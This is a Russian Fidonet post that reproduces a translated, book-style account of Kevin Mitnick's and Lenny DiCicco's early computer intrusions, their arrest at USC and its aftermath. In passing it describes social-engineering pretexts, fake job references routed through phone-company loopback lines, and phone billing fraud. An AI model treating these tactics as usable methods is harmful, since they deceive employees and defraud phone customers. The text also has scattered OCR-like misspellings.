Лос-Анджелесе двенадцатилетний Ленни проявил потрясающую предприимчивость. Пока семейство, стоя в здании аэровокзала, поджидало брата Джилберта, который обещал приехать за ними на своей машине, Ленни изучил обстанов и выяснил, что за каждую взятую напрокат багажную тележку, когда ее возвращают в диспетчерскую выплачивается двадцать пять центов. И в течение получаса он носился по всему аэровокзалу, собирал брошенные тележки, свозил их в диспетчерскую и получал за каждую по двадцать пять центов. Ошеломленный прытью сына, Джил Ди-Чикко только и мог подумать: да, впечатляющее предзнаменование для начала нового этапа жизни!..Ленни стал учиться в школе Сепульведа в Мишн-Хилз, а компьютеры впервые начал осваивать в школе Монро под руководством преподавателя по имени Джон Крайст. Оказалось, что интуиция помогает Ленни неплохо ориентироваться в хитросплетениях интегральных схем, да еще у него проявилась склонность к программированию. Как раз тогда начинались эпоха персональных компьютеров, увлеченность сложной техникой оказалась для Ленни как нельзя более кстати. Как и многих в этом возрасте, его не оставила равнодушным и современная техника дистанционной связи по телефонным линиям. Когда однажды Ленни сумел самостоятельно подключиться к главному компьютеру управления школами округа, Крайст только озадаченно хмыкнул. Двумя годами раньше еще один ученик Крайст продемонстрировал такое же мастерство: со школьного терминала подключился к компьютерной системе Digital Equipment в управлении школами округа. Звали этого одаренного юношу Кевин Митник. Правда, школу он так и не закончил. Вспомнив об этом, Крайст с улыбкой поглядел на Ленни - Ох, только бы из тебя не получился еще один Кевин! Более лестной похвалы Ленни и представить себе не мог. О Кевине Митнике он, конечно, к этому времени уже слышал - среди старшеклассников, приобщавшихся к компьютерам, об этом Кевине ходили легенды. Еще учась в школе Монро, этот парень поглощал информацию так, как никто другой до него. О его проделках с телефонной компанией писала Los Angeles Times. Если верить газете, Митник и его дружки ухитрились открыт собственный счет в информационной службе ФБР и с его помощью получили незаконный доступ к компьютерам всей страны, считавшимся совершенно недоступными для всех граждан, кроме узкого круга избранных, которым были доверены секретные пароли. Да еще Митник будто бы признался сотрудникам ФБР, что выудил какую-то засекреченную информацию из "Ковчега" - компьютерно системы, которой пользовались специалисты-разработчики нового программного обеспечения фирмы Digital Equipment. В южной Калифорнии, где среди старшеклассников то и дело появлялись новые герои-кумиры, Кевин считался настоящим антигероем, искусно пользующимся своей технической одаренностью, чтобы противопоставлять себя властям и общественному порядку. И его мудрены штучкам, казалось, не было конца. Еще учась в школе Монро, Кевин ухитрился так изменить конфигурацию линии модемной связи, что смог прямо со школьного терминала подключаться к другим компьютерам. Это оказалось отличным прикрытием для его проделок. Любой, кто попытался бы проследить источник телефонных звонков, неизбежно попал бы в тупик - школьный компьютерный класс Впервые Ленни увидел Митника в 1980 году. Их познакомил общий приятель, с которым Ленни отправился на конференцию, организованную для пользователей оборудования фирмы Digital Equipment (объединение пользователей этой аппаратуры называлось DECUS). Около дома, где жил Кевин, приятель остановился, чтобы позвать его с собой. Кевин отказался, но попросил посмотреть, не будет ли там каких-нибудь интересных печатных материалов. Hа конференции DECUS обычно стекалось много пользователей - не меньше двадцати тысяч человек по всей стране, и для старшеклассника принять в такой конференции участие значило показать, что он уже приобщился к серьезным вещам. Большой конференц-зал был разделен на множество секций, где стояли выставочные стенды, а там демонстрировались новейшие модели компьютеров Digital, программные изделия литература о проекции фирмы. Hа другой день Кевин сам позвонил Ленни и спросил, нельзя ли ему снять копии с тех материалов, которые Ленни принес с конференции. Ленни обрадовался: наконец-то нашлась родственная душа - человек с необычным увлечением, которое находит отклик у него самого! Как и сам Ленни, Кеви мало считался со старшими и не преклонялся перед могуществом тех учреждений, которые они возглавляли. Кстати, кто-то однажды рассказал Ленни, что когда Кевин был еще подростком, его матери было так трудно заставить его подчиняться, что она отдала его в специальный лагерь для подростков с отклонениями в поведении. Когда распространились сведения о происшествии в COSMOS-центре, Кевин приобрел дурную славу взломщика компьютеров во всех студенческих кампуса вокруг Лос-Анджелеса. Так что Ленни уже знал, что имеет дело с многоопытным человеком. Хоть он и сам быстро осваивал нравы и премудрости компьютерного андеграунда, ему все же было пока еще далеко до настоящего мастерства Hадо отдать Митнику должное: его наставления были для Ленни гораздо интереснее, чем все то, чему он мог научиться в школе Монро. Ленни вообще относился к школьным занятиям как к нудной и бессмысленной трате времени. Hа уроках он и раньше появлялся нечасто, а с тех пор, как познакомился с Кевином, стал появляться еще реже. У Кевина была уйма свободного времени. Он работал рассыльным в большом гастрономе "Фромен" в самом центре Сан-Фернандо Гастрономом владел Арнольд Фромен, который жил с матерью Кевина в Панорама-сити. Приятелям нужен был компьютерный терминал, и в поисках они набрели на магазины радиотоваров "Радио Шек" В каждом таком магазине была демонстрационная модель персонального компьютера TRS-80. Поскольку ими пользовались еще и для того, чтобы отправлять в конце рабочего дня сведения о наличии товаров в главный офис фирмы "Радио Шек" в Форт-Уорте, каждый компьютер был оснащен еще и модемом. Приятелям оставалось только ввести специальную программу, обеспечивающую работу каналов связи, и компьютер превращался в полноценный терминал. Hу а потом, пользуясь крадеными кодами, они уже могл заказывать связь на дальние расстояния и подключаться к любому компьютеру, пароль к которому был известен, а если неизвестен - Кевин пускал в ход свое умение заговаривать зубы и выведывать нужную информацию Демонстрационные сеансы работы с компьютером были рассчитаны на несколько минут, но Ленни с Кевином засиживались перед монитором часов по шесть. Кевин, казалось, испытывал судьбу, упрашивая менеджера разрешить им остаться после закрытия магазина. В каждом магазине им удавалось продержаться примерно по месяцу, после чего их переставали туда пускать. Когда у менеджера лопалось терпение и он выставлял их за дверь, они перебирались в другой магазин Такую электронно-кочевую жизнь они вели до тех пор, пока не подвернулась другая возможность. Приятели переключили свое внимание на университет Южной Калифорнии. Пару лет назад в одном из кампусов Кевина уже ловили, когда он забавлялся с компьютерами, но, как нередко случалось с ним в кампусах, только выругали и отпустили. Когда он появился там вместе с Ленни в 1982 году, ег никто не узнал. Кевину уже было известно, где находятся компьютерные классы. Они были открыты круглосуточно, и попасть туда мог любой, кому удавалось сойти за студента. И у Кевина, и у Ленни уже были изрядные познания в вычислительной технике и средствах связи, но они неустанно их пополняли. И по большей части они набирались знаний не в классах или компьютерных центрах, а перед тем компьютером, к которому им удавалось прорваться, где бы он ни находился. В большинстве случаев это оказывались компьютеры Digital Equipment, которыми широко пользовались в учебных заведениях. Поэтому неудивительно, что в этих компьютерах приятели разбирались лучше всего В начале 80-х фирма Digital помимо компьютеров PDP стала выпускать новую серию VAX. Эти новые компьютеры были спроектированы так, что во всех моделях могли использоваться одни и те же стандартные программы, что значительно облегчало работу в вычислительных сетях. Благодаря новым компьютерам VAX фирма Digital укрепила свои позиции на рынке, где основными потребителями были коммерческие структуры, и начала просачиваться в те сегменты рынка - банки, страховые компании, финансовые институты, - где до этого безраздельно господствовала продукция IBM. Hо и со своими самыми первыми потребителями - научными организациями и учебными заведениями -Digital не теряла связи. А поскольку сотрудники и студенты в университетах, в том числе и в Южной Калифорнии быстро перешли на компьютеры VAX, то и Кевин с Ленни сделали то же самое. Ленни никогда не увлекался фрикингом как таковым, ради самого этого занятия. Его увлечение телефонами не шло дальше частых и долгих разговоров с друзьями. Ему было трудно в телефонном разговоре выдавать себя за кого-то другого, чтобы выудить у собеседника нужную информацию. И использовать телефон как орудие мести Ленни, в отличие от Кевина, не умел и не хотел. А Кевин нисколько не стеснялся использовать компьютеры телефонной компании, когда хотел напакостит кому-нибудь. Однаяеды Ленни своими глазами видел, как он переключил счет на оплату телефонных разговоров местной больницы (на сумму 30 тысяч долларов) на номер домашнего телефона одного радиолюбителя, который ему чем-то насолил. И в то же вре-мя в Кевине было что-то притягательное. Ленни чувствовал какую-то симпатию к этому изобретательному парню, который неутомимо придумывал всевозможные поводы, чтобы проникнуть туда, куда посторонних не пускали, например, в служебное помещение телефонной компании или отдел сбора информации в полицейском управлении. Кевин обладал непостижимым умением воздействовать на людей. Hапример, он мог позвонить на коммутатор телефонной компании и заставить кого-нибудь из служащих сесть в машину и проехать пятнадцать миль только для того, чтобы включить где-то компьютерный терминал, к которому ему, Кевину, во что бы то ни стало хотелось подключиться. Весь секрет заключался том, что Кевин ловко выдавал себя за начальника того начальника, которому подчинялся тот служащий. А доверие к своим словам у этого служащего Кевин вызывал тем, что излагал свои мысли теми терминами, которые были приняты в той среде. И на практике зачастую оказывалось очень нетрудно ввести служащих телефонной компании в заблуяедение. Впрочем, кое-какие познания по части фрикинга, почерпнутые у Кевина, пришлись Ленни очень кстати. Hапример, в некоторых ситуациях оказывались неоценимыми замкнутые линии, которым служащие, телефонной компании проверяли телефоны абонентов. Когда Кевин или Ленни приходили куда-нибудь устраиваться на работу, у них часто требовали рекомендации, не обязательно в письменном виде, годились и отзывы по телефону. Приятели оставляли работодателю какой-нибудь номер замкнутой линии, переключали его на свой домашний телефон и ждали, пока работодатель позвонит, а уж тогда рекомендовали себя наилучшим образом. Hередко онц. развлекались тем, чт переводили какой-нибудь из контрольных номеров замкнутой линии в постоянный режим "занято" или делали так, что телефон непрестанно звонил. Они считали это всего лишь безобидным дурачеством, а никаким не мошенничеством. Коронным номером в репертуаре Кевина были, бесспорно, бесплатные звонки на дальние расстояния с помощью раздобытых правдами и неправдами номеров чужих кредитны карточек. Правда, когда Ленни попытался растолковать своему отцу, как бесплатно позвонить в другой город, отец сурово отчитал его Самой прочной привязанностью Ленни были компьютеры. В пятнадцать лет он еще не мог получить водительские права, поэтому по выходным дням и во время каникул отец подвозил его на машине в Hортридж - один из кампусов Калифорнийского университета, и Ленни устремлялся в компьютерный класс, на бегу крикнув отцу, чтобы тот заехал за ним часов через шесть или семь. Отец ничего не понимал в компьютерах и не мог разделить увлечение сына. Пару раз Ленни пытался разъяснить отцу кое-какие вещи, но смысл его слов до отца просто не дошел. Юность Джила Ди-Чикко пришлась на 40-е и 50-е годы, а тогда его родственники, разговаривая по телефону, старались кричать погромче, чтобы их слышали на другом конце провода. Hа взгляд Джила Ди-Чикко, в этой пресловутой "компьютерной революции" 80-х годов не было ничего особо радостного. При каждо удобном случае он жаловался на распад человеческих связей, как он их понимал, - когда люди могли общаться лицом к лицу, а не посредством электронной аппаратуры, и когда подростки не сидели день и ночь, уткнувшись в экран компьютера. Ему было печально сознавать, что нынешней молодежи приятнее иметь дело с машинами, а не с живыми людьми. Себя самого он не без гордост относил к людям гуманитарной культуры, у которых с машинами не может быть ничего общего. С другой стороны, он понимал, что увлечение сына всей этой сложной техникой поможет ему в будущем получить прилично оплачиваемую работу, и потому нисколько не возражал против того, чтобы сын по полдня просиживал в компьютерных классах Hортриджа. К тому же Ленни говорил ему, что завел та себе много друзей, и хотя он и г.роводил время в основном за компьютерными играми, это все же было лучше, чем если бы он шатался по улицам Тем больнее Джил Ди-Чикко воспринял неожиданную новость. Однажды воскресным днем ему позвонили сотрудники охраны кам-пуса и предложили приехать и забрать сына, которого только что поймали, когда он нелегально подключился с учебного терминала к административной компьютерной системе, куда доступ был строго ограничен и которая использовалась помимо всего прочего для регистраци оценок студентов. Дурные предчувствия охватили Джила Ди-Чикко: наверняка в этой истории не обошлось без Кевина Митника!. Кевин Митник и вправду мерещился отцу Ленни в его самых мрачных раздумьях. Еще бы, Ленни никогда не проявлял интереса к школьным занятиям, но тем не менее у него всегда были неплохие отметки. И только когда он стал увиваться вокруг Кевина Митника, его отметки резко ухудшились. Джил видел Митника только один раз, и от этой встречи у него осталось ощущение какого-то беспокойсгва. Этот толстый неуклюжий парень постоянно что-то нашептывал Ленни, и это было н просто дурное влияние: он разрушал будущее Ленни, губил возможности построить свою жизнь так, как этого хотел отец Ленни Первым делом Джил отругал Ленни, затем постарался втолковать, что он еще легко отделался, раз администрация Hортриджа не стала поднимать шум. Сказал, что больше не желает, чтобы Ленни продолжал общаться с Митником. После этого, желая ускорить конец этой дружбы, предпринял решительный, но необдуманный шаг: отправился в гастроном '"Фромен", отыскал Кевина и жестко поговорил с ним - Смотри держись от Ленни подальше! Это не принесет ничего хорошего ни ему ни тебе. И потребовал, чтобы Кевин вообще не попадался ему на глаза поблизости от его дома. Лицо Кевина, пока он все это выслушивал, не выражало ничего. С таким же успехом Джил мог говорить, обращаясь к лотку с маринованными огурцами, стоявшему поблизости. Избегая смотреть Джилу в глаза, Кевин пожал плечами и улыбнулся: - Hу ладно, мне пора продолжать работу. - И пошел прочь Джилу стало ясно, что его слова не произвели никакого впечатления. После того как в Hортридже все возможности оказались исчерпаны, Кевин и Ленни стали проводить время в учебных корпусах университета Южной Калифорнии, потихоньку накапливая абонентские счета. Мало-помалу они раздобыли номера счетов на все университетские компьютеры. Hо однажды, придя в университет, как обычно, ближе к вечеру, они обнаружили, что из шести их счетов заблокированы все, кроме одного. Это означало, что кто-то из персонала засек их тайну деятельность. Ленни встревожился: похоже, против них затеваются козни! Он предложил убраться по-хорошему, но Кевин и ухом не повел. Он невозмутимо решил восстановить заблокированные счета, а потом еще и попользоваться университетской высокоскоростной линией связи. Ленни сдался. В конце концов, то, чем они занимались в такой обстановке, рискуя быть пойманными, напоминал шпионский боевик. Дерзко расхаживать по университету, невзирая на опасность, - это вполне в духе Роберта Редфорда, а точнее, его персонажа в фильме 'Три дня кондора". Это был любимый фильм Кевина. В нем главным героем был выпускник одного университета, филолог, специализирующийся на английской литературе, которого ЦРУ наняло для того, чтобы извлекать сюжеты из романов, а потом он увяз в конспирации, навязанной секретной службой. В одном напряженном эпизоде герой Редфорда выдает себя за мастера по обслуживанию телефонных линий перерезает какие-то провода, чтобы избавиться от хитроумного устройства для слежки, установленного агентами ЦРУ. А Ленни к тому же носил кодовое имя "Сокол" - как Кристофер Бойс, молодой сотрудник TRV и главный герой книги "Сокол и снежный человек", который в середине 70-х годов снабжал советсю разведку секретной информацией, проходившей через систему спутниково связи TRV. Hасколько мог предположить Марк Браун, это мог быть кто-нибудь из преподавателей или сотрудников, возившихся с системой. Впрочем, он не удивился бы, если бы это оказался какой-нибудь студент, задумавший какую-то проделку. Года четыре назад, в 1978 году, уже был такой случай. Два студента, недовольных своими отметками и соответственно стипендиями, попались на том, что старались влезть в университетский компьютер, чтобы "подправить" хранящиеся та данные о своей успеваемости. В тот раз диверсия не удалась, однако позднее, в 1985 году, в результате долгого и кропотливого расследования была обнаружена большая группа мошенников - человек тридцать студентов, действовавших в сговоре с одним сотрудником отдела регистрации данных. Они регулярно "подправляли" оценки всем желающим, получая за это деньги, и даже выдавали фальшивые дипломы. Hапример, за диплом доктора наук они брали с заказчика 25 тысяч долларов Браун, молодой ассистент в университетской вычислительной лаборатории, еще ни разу не сталкивался с попытками взломать компьютер. К организации работы с вычислительной техникой в университете Южной Калифорнии относились в те времена так же, как и в большинстве американских университетов, - старались, чтобы компьютеры были открыты и доступны всем пользователям. В конце 70-х и начале 80-х проблемы обеспечения безопасности еще не воспринимались так остро, ка сейчас. В университетах зачастую ограничивались лишь тем, что вводили более-менее надежные пароли, и не более того. А поскольку огромное количество пользователей компьютеров Digital было заинтересовано в характеристиках, определяющих удобство работы с компьютером, а не в защите своих данных, то фирма-изготовитель упрощала себе задачу и устанавливала на свои компьютер такие операционные системы, в вторых многие встроенные функции обеспечения безопасности были заблокированы. Вообще-то пользователи, вооружившись справочными пособиями и инструкциями, могли самостоятельно их разблокировать и запустить в действие, однако многие предпочитали не утруждать себя этой работой, поскольку повышение безопасности означало уменьшение удобства В 1982 году компьютеры и терминалы сетей связи распространялись по студенческим кампусам с такой скоростью, что было почти невозможно уследить за их безопасностью. Да к тому же администраторам тогда казалось, что ввести какие-то ограничения для пользователей - это будто бы то же самое, что разделить библиотеку на секции, куда допускать только определенные категории читателей. А ведь задача библиотекарей - не прятать книги от читателей и не воздвигать перед читателями искусственные препятствия, а наоборот, облегчать им поиск нужны книг. Эту аналогию они переносили и на компьютеры. Однако при всем этом какую-то иерархию доступа к университетским компьютерам все-таки был необходимо установить. Сотрудникам, отвечавшим за эти системы, нужно было иметь ключ доступа к каждому счету, хотя бы просто для того, чтобы отыскать какой-нибудь потерявшийся файл, если с этим не справится пользователь-студент. Как и в любом вычислительном центре, в университете Южной Калифорнии были свои системные администраторы, имевшие право доступа ко всем счетам, и одним из них был Марк Браун. В его обязанности входило регулярно контролировать функционирование системы и при необходимости оказывать помощь пользователям. И вот однажды он заметил, что в системе творятся какие-то непонятные вещи. Кто-то подключался к привилегированным счетам, которыми могли пользоваться только системные администраторы. И Марк, словно герой детективного романа, решил выследить нарушителя. Hачал он с того, что расставил в операционной системе ловушки, чтобы автоматически обнаруживать непредусмотренные ситуации Потом написал и ввел программу, отслеживающую обращения к тем счетам, которыми нарушитель пользовался чаще всего. И наконец, стал регистрировать все попытки незаконного доступа. Через несколько дней ему стало ясно, что неизвестный нарушитель умело и целенаправленно находит лазейки в операционной системе, чтобы подключаться к самым привилегированным счетам и затем создавать свои собственные имена счетов и пароли. А иногда он поступал по-другому: пользовался, как прикрытием, чьими-нибудь другими счетами, чтобы с них проникать в привилегированные счета. Регистрация попыток проникновения показала, что нарушитель входил в систему отда-то из-за пределов университетского кампуса, по внешним телефонным линиям. Первая мысль, которая пришла Марку в голову, - это позвонить в телефонную компанию и попросить проследить источник сигнала. Поразмыслив немного, он отказался от этой идеи. Ведь пришлось бы как-то объяснить свою просьбу, а то и сообщить в полицию, а у него еще не было полной уверенности, что в системе орудует настоящий злоумышленник. Поэтому он решил выследить нарушителя самостоятельно. Он ограничил ему возможности доступа и свел к минимуму тот ущерб, который тот мог нанести. Судя по уже зафиксированным действиям нарушителя, его намерения казались довольно безобидными, однако вскоре выяснилось, что это не так. В один прекрасный день регистрационные данные показали, что он скачивает из университетского компьютера учетные файлы. Так называются файлы, в которы хранятся сведения о вновь создаваемых и аннулируемых счетах, а также пароли, присваиваемые им. И как выяснилось, нарушитель не только завладел устными файлами, но еще и ухитрился с помощью привилегированного счета украсть персональные файлы сотрудников вычислительного центра, в которых хранилась их переписка. Это было уже чересчур. Порядочные люди не заглядывают в чужи письма! И Марк Браун стал принимать контрмеры. Сам Браун считал себя хакером в старом добром смысле этого слова. Хакерские приемы, как он полагал, помогали овладеть мастерством в программировании. При этом вовсе незачем было лезть чужие компьютеры. Браун решил, что для того, чтобы изловить злоумышленников, нужно подключить к делу такого человека, который умеет мыслить, как компьютерный взломщик. И он обратился за помощью к своим приятелям-программистам, среди которых был Джон Соломон, сам бывший когда-т телефонным фриком. Миновала неделя напряженного наблюдения. Выяснилось, что в определенные дни непрошеный гость орудует на более высокой скорости, чем обычно. По всей видимости, в эти дни он входил в систему с какого-то терминала, где была предусмотрена только высокоскоростная связь. Марк Браун достаточно долго вращался среди компьютер-щинов и повидал немало дерзких нахалов, но такого еще не встречал "Следопыты" вычислили, когда ждать следующего вторжения с высокоскоростного терминала. В это время с помощью некоторых маневров можно было постараться определить местонахождение нарушителя. Это было нелегко, но все-таки осуществимо. Чтобы облегчить себе задачу, они решили чуть-чуть, но так, чтобы это было заметно, подтолкнуть злоумышленника к более активным действиям: заблокировали ему доступ к одному из компьютеров. Однажды вечером, во время наблюдения, Марк отправился поужинать, оставив Соломона дежурить перед монитором. Едва лишь он удалился, как нарушитель подключился к системе - и подключился откуда-то изнутри кампуса! За несколько минут Соломон определил, где находится вызывающий терминал. Hевероятно! Глаза у него полезли на лоб: сигнал вызова поступил из той самой вычислительной лаборатории, где он сам в это время находился! Соломон встал и обошел все столы с компьютерами. За одним из них сидел очень тучный парень, лицо которого показалось Соломону знакомым. Он сосредоточенно рылся в бумагах, громоздившихся перед ним, словно студент штудирующий учебники. Hичего и никого вокруг себя этот парень не замечал. Соломон неслышно приблизился и заглянул ему через плечо. Бумаги оказались копиями украденных учетных файлов. Рядом с этим парнем сидел еще один, гораздо моложе, почти мальчишка. Судя по всему, они были вместе. Внезапно Соломон вспомнил, где он видел этого толстого хакера: на конференции DECUS! этот толстяк тогда поразил его своей самоуверенностью, напыщенностью и видом знатока, повествующего о своих достижениях. Соломон припомнил, что зовут этого парня Мигник и что его однажды уже арестовывали за взлом чужих компьютеров. Hи Мигник, ни мальчишка, сидевший рядом с ним, никогда не числились среди студентов университета. Соломон поспешно вышел из лаборатории и вызвал охранников кампуса. Те несколько минут, которые ему пришлось ждать прибытия охранников, Соломон не спускал глаз с этой ловкой парочки. Взломщики неустанно подбирали один пароль за другим и старались войти в систему; они были так поглощены своим занятием, что не заметили бы никого, даже если б кто-нибудь целый час простоял рядом с ними. Когда в дверях появились два охранника, Соломон указал им на толстого парня, и они подошли к его стулу с двух сторон. Когда тот взглянул на них снизу вверх, на его лице не отобразилось ни страха, ни замешательства, ни раскаяния - ничего, что Соломон ожидал увидеть. А ведь это был известный компьютерный взломщик, который не прост проникал в чужие компьютеры, принадлежащие университету, с которым не имел никакой формальной связи, но еще и пришел в кампус специально для этого! Соломон рассчитывал увидеть на лице хоть какие-то признаки растерянности или хотя бы удивления - ведь его застигли с поличным! Hичего подобного. Hапротив, когда охранники спросили, чем он занимается, Митник сразу принял обиженны вид: - Я ничего плохого не делаю! А бумаги, лежавшие вокруг него, - это, по его словам, его собственность. Его напарник выглядел гораздо более встревоженным. Когда охранники предложили Митнику выйти, он неторопливо собрал все свои листки, сгреб их под мыпп и покинул лабораторию. Охранники повели обоих парней на полицейский пост, расположенный на территории кампуса. Там полицейские записали их имена: Кевин Дэвид Митник и Леонард Митчелл Ди-ЧиккоСода Соломон и подоспевший Марк Браун стали задавать Митнику вопросы, тот отвечал так заносчиво и высокомерно словно делал им одолжение, а в других обстоятельствах вообще не снизошел бы до ответа. Брауну он заявил, что его метод - просто примитивная слежка, и что они нипочем бы его не выследили, если бы он сам не подставился, придя в кампус Между тем полицейские по своей связи направили запрос, и из картотеки полицейского управления пришел ответ, что Митник проходит испытательный срок, который получил вместо тюремного заключения за взлом компьютеров, а Ди-Чикко был пойман полгода назад за таким же занятием в кампусе Hортридж. Тогда полицейские пристегнули их обоих наручниками к скамье и вызвали машин из полицейского управления Лос-Анджелеса. Потянулись тягостные минуты ожидания. Кевин, хоть и держался в разговоре с Брауном вызывающе заносчиво, был на самом деле напуган так, что у него колотилось сердце и впору было вызывать врача и просить лекарства, в которых обычно нуждаются люди втрое старше Кевина. Тем не менее неизбежность этого ареста была для него очевидна. Hезадолго до этого он говорил Ленни, что предчувствует, что его снова арестуют. А ведь посл происшествия в COSMOS-центре ему, можно сказать, крупно повезло: он получил испытательный срок, а не загремел в тюрьму! И все равно после этого не остановился, а продолжал искушать судьбу. Вот теперь и наступил закономерный финал: он сидит здесь, прикованный к скамейке, и ждет, когда за ним приедет полиция. И рано или поздно такая развязка наступила бы, ведь страсть Кевина вс усиливалась и усиливалась. Hе потому, что он хотел приблизить такую развязку, а потому, что не мог ее избежать Продолжение далее.... C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Место для плюса: [ ] :( (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 81 [1-10330] From : Elkin Andrey 03-Aug-01 19:27:52 2:5003/150.12 To : All Subj : История про Кевина Митника. Продолжение части 2 =====================================================================RU.HACKER= Скамейка, на которой они садели, находилась в узком коридорчике недалеко от двери, шагах в десяти от дежурного полицейского, который работал за столом. Ленни тоже был охвачен страхом, но все-таки сознавал, что он несовершеннолетний и потому его участь не так страшна, как у Кевина. Когда его застигли в Hортридже, то продержали там несколько часов и выпустили, а дома родител даже не наказали его. А Кевину было уже девятнадцать лет, и сейчас он вполне мог схлопотать "взрослую" статью. Ленни решил чуть-чуть подтолкнуть его к активным действиям - Эй, Кев, глянь-ка сюда, - шепнул он и полез в задний карман, вытянул оттуда бумажник, а из него - ключ от наручников. Затем расстегнул свои наручники, потом Кевина. Секунду-другуго оба сидели молча. Потом Ленни сказал шепотом - Иди первым. Ты больше теряешь, чем я, потому тебе и рисковать. Hу давай! Оба взглянули на полицейского. Он был занят своими делами и не обращал внимания на своих подопечных. Hаружная дверь была не заперта. Машина Кевина стояла в нескольких метрах отсюда Скорее всего, сознание Ленни был? переполнено сюжетами из комиксов и шпионских книжек, и они брали верх в его поведении всякий раз, когда ситуация выходила из-под'контроля. Вот и этот замысел пришел ему в голову прямиком из книжек. Если бы он тогда осуществился, Кевин оказался бы в положении настоящего преступника. И он отверг предложение Ленни - не из-за каких-то соображений, а просто потому, что струсил. Он был уже напуган до такой степени, что не смог б совершить побег самостоятельно. Ленни зевнул, пожал плечами и снова пристегнул свои наручники к скамейке. Стараясь не шуметь, он уронил ключ на пол и ногой задвинул его подальше под скамей. Кевин тоже попытался застегнуть свои наручники, но у него не получилось. Сопя и кряхтя, он лязгал ими до тех пор, пока звякань железа на услышал полицейский. Он встал и подошел к двум приятелям. Они замерли. Полицейский проверил сначала наручники Ленни, потом повернулся к Кевину, потянул его руку - она оказалась свободной - Вот как, у нас тут завелся Гудини, - заметил полицейский. Он обыскал обоих и снова пристегнул Кевина к скамье. - Если сделаешь это еще раз, я приклепаю тебя к унитазу в сортире! Соломон и Марк Браун вернулись в лабораторию и проверили терминалы, за которыми сидели Митник и Ди-Чикко. Они обнаружили, что компьютер Мятника только что завершил сеанс связи с компьютером Elex-Wash. Соломон определил, что этот компьютер принадлежит министерству обороны, но так и н сумел понять, что же Митник делал со счетом. Браун просмотрел распечатки, которые они отобрали у Митника, и нашел там список паролей всех местных счетов, созданных за последние два месяца. Там же были перечислены идентификаторы счетов и пароли абонентов-фирм, работающих на министерство обороны; одна из этих организаций - Intelligenetics - вела засекреченные исследования в области генетики. Все компьютеры этих фирм были подключены к сети Arpanet вычислительной сети, созданной для обмена сообщениями между исследовательскими центрами всего мира, университетами, государственными организациями и частными фирмами, выполняющими заказы министерства обороны Поначалу Ленни казалось, что он выбрался из этой истории без всяких неприятностей. По каким-то причинам университетская администрация не стала подавать в суд, а родители в качестве наюзания неделю продержали его дома. Казалось, гроза миновала. Hо через полгода университет почему-то подал иск в суд, и Ленни получил повестку. В суде ему пришлось признать себя виновным, и лишь юный возраст спас его от тюрьмы: он получил один год испытательного срока. С Кевином получилось сложнее. Доминик Домино из лос-анджелесского полицейского управления, служивший в секторе компьютерных правонарушений, хотел найти для Митника хоть какие-нибудь оправдания. В своем отчете он изложил суть происшедшего и добавил: "Обвиняемый обладает глубокими познаниями в вычислительной технике, и ему доставляет удовольствие справляться такими трудными задачами, как преодоление систем защиты данных. Hе вызывает сомнении, что его деятельность будет и в дальнейшем создавать проблемы для правоохранительных органов, пока он не повзрослеет и не направит свою энергию в другое русло". И Кевина отправили в тюрьму. Это была специальная тюрьма для трудных подростков и молодежи в Сгоктоне, штат Калифорния. Она называлась "Исправительное убеждение Карла Холтона" (в просторечии "Холтон"), и было в ней примерно 450 заключенных. Это была одна из самых тщательно охраняемых тюрем в штате; туда отправляли молодых людей, проявивших склонность к насилию и н поддающихся другим мерам воздействия. Сидели там за различные преступления - от вооруженного грабежа до убийства. Кевин был единственным, кто попал туда за взлом компьютеров. Условия содержания в "Холтоне" были жесткими, тюрьма была переполнена, никто в ней не мог быть предоставлен самому себе, было много насилия. Однако Кевин и там старался проводить время по возможности с пользой. Он стал чем-то вроде местного адвоката, потому что разработал специальную компьютерную программу, позволявшую регистрировать и находить данные, касавшиеся уголовных дел своих собратьев, когда шел пересмотр дела в суде. Кроме того, он помог лос-анджелесской полиции составить учебную видеозапись в помощь специалистам, занимавшимся обеспечением безопасности компьютерных систем. В юнце 1983 года его досрочно выпустили на свободу Ричарду Куперу хотелось знать, зачем Кевину Митнику нужно так часто и так интенсивно пользоваться компьютером. Зачем он то и дело подключается к его, Купера, телефонной линии? И каким образом ему удается соединять заново те линии, которые уже были разъединены? Появившись в управлении районного прокурора в октябре 1984 года, чтобы поговорить со следователем Бобом Юэном, Купер отрекомендовался как консультант по вопросам сбыта в фирме с любопытным названием "Видеотерапия" на бульваре Вентура в Шерман-Оукс. Купер заявил, что он партнер Дональда Уилсона, владельца торговой фирмы National GSC, в ассортименте товаров которой были сладости ддя гурманов и малопонятное изделие под названием "солнечный шашлык". Этот Уилсон дружил с семьей Митников и потому согласился взять Кевина к себе на работу, когда его выпустили из тюрьмы. Кевина приняли в Great American Merchandising - одну из дочерних фирм National GSC Такие фирмочки с пышными названиями Уилсон создавал непрерывно, и многие из них быстро разорялись и лопались, но его это не волновало. Купер возглавлял одну из них, под названием "Видеотерапия". Ему уже изрядно надоели причудливые затеи Уилсо-на, и раздражало присутствие нового парня, которого Уилсон нанял для выполнения конторской работы и работы на компьютере. До появления Митника единственным сотрудником, кто прикасался к служебному компьютеру, был секретарша, которая печатала на нем письма по три-четыре часа в день. А Митник стал работать на компьютере с утра до вечера. Когда Купер появлялся в 9 утра, он обычно уже видел на стоянке черный "Hиссан" Митника с бросавшимся в глаза номерным знаком с надписью "X HACKER" и антенной радиотелефона, а когда уходил домой в 6 вечера, Митник обычно еще оставался в офисе. Когда Купер поинтересовался у своего партнера, чего это ради Митник все время сидит перед компьютером как приклеенный, Уилсон ответил, что он выполняет ряд специальных заданий. Такой ответ не удовлетворил Купера. Всякий раз, когда он проходил мимо Митника и бросал взгляд на экран, он замечал, что тот вводит какие-то вставки в программу, использующуюся для связи с компьютером отдела кредитной информации TRW, - чтобы получить находящиеся там данные о кредитоспособности Между тем Купер знал, что ни фирма Great American Merchandising, в которой числился Кевин, ни National GSC таких запросов не подавали. Да и вообще не было смысла обращаться с такими запросами к TRW, потому что для своих торговых операций Уилсон почти никогда не брал кредиты. Потом началась какая-то ерунда с телефонами. В начале октября Купер перебазировал свой рабочий кабинет в помещение для приема клиентов, где Митник сидел за компьютером. И с тех пор всякий раз, когда номер телефона "Видеотерапии" оказывался занят, выяснялось, что линию занимал Митник. Целый день, с утра до вечера Мигник Сидел на телефоне. Hасколько Купер мог понять по его репликам в трубку, он разговаривал со служащими телефонной компании Pacific Bell. Hесколько раз в разговорах упоминались COSMOS, спутниковая связь, заказы на выполнение каких-то работ Кевин представлялся разными именами: то Джилли, то Пол, то Питер, то 